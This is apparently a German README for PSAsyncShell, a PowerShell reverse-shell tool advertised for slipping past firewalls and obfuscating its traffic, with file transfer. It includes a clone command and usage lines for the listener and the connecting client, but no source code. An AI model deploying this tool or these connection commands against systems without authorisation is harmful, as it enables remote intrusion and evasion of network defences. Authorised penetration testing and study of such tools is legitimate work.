
Asynchrone TCP-Reverse-Shell in reinem PowerShell, die Firewalls durch nicht-blockierende E/A umgeht, mit Befehlsverlauf, Datei-Upload/-Download und obfusziertem Base64-Datenverkehr.

PSAsyncShell ist eine asynchrone TCP-Reverse-Shell, die in purem PowerShell geschrieben ist.
Im Gegensatz zu anderen Reverse-Shells erfolgt der gesamte Kommunikations- und Ausführungsablauf asynchron, was es ermöglicht, einige Firewalls und Gegenmaßnahmen gegen solche Remote-Verbindungen zu umgehen.
Darüber hinaus bietet dieses Tool eine Befehlsverlaufsfunktion, Bildschirmbereinigung, Hoch- und Herunterladen von Dateien, Aufteilung von Informationen in Blöcke sowie reverse Base64-URL-kodierten und verschleierten Traffic.
Es wird empfohlen, das gesamte Repository zu klonen oder die ZIP-Datei herunterzuladen. Dies kann mit dem folgenden Befehl durchgeführt werden:
git clone https://github.com/JoelGMSec/PSAsyncShell
.\PSAsyncShell.ps1 -h
____ ____ _ ____ _ _ _
| _ \/ ___| / \ ___ _ _ _ __ ___/ ___|| |__ ___| | |
| |_) \___ \ / _ \ / __| | | | '_ \ / __\___ \| '_ \ / _ \ | |
| __/ ___) / ___ \\__ \ |_| | | | | (__ ___) | | | | __/ | |
|_| |____/_/ \_\___/\__, |_| |_|\___|____/|_| |_|\___|_|_|
|___/
---------------------- by @JoelGMSec -----------------------
Info: Dieses Tool hilft Ihnen, eine Remote-Shell über asynchrones TCP zu erhalten, um Firewalls zu umgehen
Usage: .\PSAsyncShell.ps1 -s -p listen_port
Auf eine neue Verbindung vom Client warten
.\PSAsyncShell.ps1 -c server_ip server_port
Den Client mit einem PSAsyncShell-Server verbinden
Warning: Alle Daten werden unverschlüsselt gesendet
Die Upload-Funktion verwendet kein MultiPart
Dieses Projekt ist unter der GNU 3.0-Lizenz lizenziert – siehe die LICENSE-Datei für weitere Details.
Dieses Tool wurde von Grund auf von Joel Gámez Molina // @JoelGMSec erstellt und entworfen.
Diese Software bietet keinerlei Garantie. Ihre Verwendung ist ausschließlich für Bildungsumgebungen und/oder Sicherheitsaudits mit entsprechender Einwilligung des Kunden bestimmt. Ich bin nicht verantwortlich für Missbrauch oder mögliche daraus entstehende Schäden.
Weitere Informationen finden Sie auf Twitter unter @JoelGMSec und auf meinem Blog darkbyte.net.
Sie können meine Arbeit unterstützen, indem Sie mir einen Kaffee kaufen: